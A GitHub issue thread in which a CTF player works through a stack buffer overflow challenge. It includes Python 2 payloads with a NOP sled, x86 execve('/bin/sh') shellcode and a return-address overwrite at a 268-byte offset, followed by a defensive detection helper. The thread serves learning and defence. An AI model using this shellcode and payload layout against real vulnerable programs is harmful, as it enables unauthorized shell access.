Stage 3 - So Close #32

Open
ikornaselur opened this issue Aug 13, 2016 · 3 comments
@ikornaselur
Collaborator

Description

Yet so far :(
/home/so_close on the shell.

Solution

Flag is: ``

@ikornaselur
Collaborator Author

It's a buffer overflow exploit that requires a shellcode to be crafted.

Bytes 269-272 in the input will overwrite the return pointer. I think we need to figure out the address to where the input is stored and then jump into it after writing shellcode to read the flag. I just don't remember exactly how to do this all, so I'm going to take a short break from this.

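```python
# Python 2: print writes these str bytes to stdout unchanged.
padding = 268                 # filler bytes before the return pointer
address = "\x91\x92\x93\x94"  # marker value landing in bytes 269-272

print "\x90"*padding + address
```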

@ikornaselur
Collaborator Author

[Image: screen shot 2016-08-13 at 18 51 11]

EBP there is overwritten by the Python script above.

@ikornaselur ikornaselur changed the title Stage 2 - So Close Stage 3 - So Close Aug 14, 2016
@ikornaselur
Collaborator Author

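```python
# Python 2: print writes these str bytes to stdout unchanged.
padding = 268
address = "\x95\x84\x04\x08"  # value placed in bytes 269-272
shell = "\x6a\x68\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x6a\x0b\x58\x89\xe3\x31\xc9\x99\xcd\x80"
padding = padding - len(shell)  # shrink the filler so 268 bytes still precede the address

print "\x90" * padding + shell + address
```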

Think this is it.. just don't know the correct address
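A defender's view of the input posted in this thread, as an added example that is not part of the original issue or the project's code: a Python 3 triage helper that measures the 0x90 run, checks for an `int 0x80` opcode after it, and decodes the last four bytes as a little-endian 32-bit value. The function names, the `min_sled` threshold and the benign sample are assumptions made for illustration.

```python
import struct

NOP = 0x90
INT80 = b"\xcd\x80"  # x86 `int 0x80`, the 32-bit Linux syscall gate

# Constructed sample: rebuilt from the byte values posted in the thread.
SHELL = (b"\x6a\x68\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e"
         b"\x6a\x0b\x58\x89\xe3\x31\xc9\x99\xcd\x80")
ADDRESS = b"\x95\x84\x04\x08"
SAMPLE = b"\x90" * (268 - len(SHELL)) + SHELL + ADDRESS


def longest_nop_run(data):
    """Return (start, length) of the longest run of 0x90 bytes."""
    best = (0, 0)
    start = None
    for i, byte in enumerate(data + b"\x00"):  # sentinel closes a trailing run
        if byte == NOP:
            if start is None:
                start = i
        elif start is not None:
            if i - start > best[1]:
                best = (start, i - start)
            start = None
    return best


def analyze(data, min_sled=32):
    """Summarise an input the way a triage script or IDS rule might."""
    sled_start, sled_len = longest_nop_run(data)
    after_sled = data[sled_start + sled_len:]
    report = {
        "length": len(data),
        "sled_offset": sled_start,
        "sled_length": sled_len,
        "has_int80": INT80 in after_sled,
        "trailing_dword": None,
    }
    if len(data) >= 4:
        # x86 is little-endian: the last 4 bytes read back as one 32-bit value.
        report["trailing_dword"] = struct.unpack("<I", data[-4:])[0]
    # Heuristic only: a long sled followed by a syscall opcode is worth a look.
    report["suspicious"] = sled_len >= min_sled and report["has_int80"]
    return report
```

Calling `analyze(SAMPLE)` reports a 272-byte input whose trailing bytes `\x95\x84\x04\x08` decode to `0x08048495`, which shows the byte order the address has to be written in.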
